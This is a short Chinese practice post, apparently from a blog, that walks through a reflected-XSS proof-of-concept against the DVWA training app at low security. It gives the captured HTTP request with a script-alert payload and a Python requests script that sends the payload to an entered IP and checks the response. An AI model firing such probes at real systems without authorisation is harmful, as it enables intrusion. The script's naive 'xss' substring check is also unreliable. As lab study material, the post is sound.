python DVWAXSSPOC练习

XSS反射性低难度

python DVWAXSSPOC练习_第1张图片

数据包

GET /dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E HTTP/1.1

Host: 10.9.75.161

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://10.9.75.161/dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3

Connection: close

构建url

target=url+'/dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E'

构建header

  headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
             "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
    }

终极POC

import requests
def XSS(url):
    target=url+'/dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E'
    headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
             "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
    }
    try:
        res=requests.get(url=target,headers=headers)
        print(res.text)
        if "xss" in res.text:
            print('[+]',url,'存在XSS漏洞')
        else:
            print('[-]',url,'不存在XSS漏洞')
    except Exception as e:
        print('Error')
        print(e)
if __name__ == '__main__':
    url=input('请输入目标IP地址:')
    XSS('http://'+url)

运行结果

python DVWAXSSPOC练习_第2张图片

你可能感兴趣的:(python,开发语言,安全)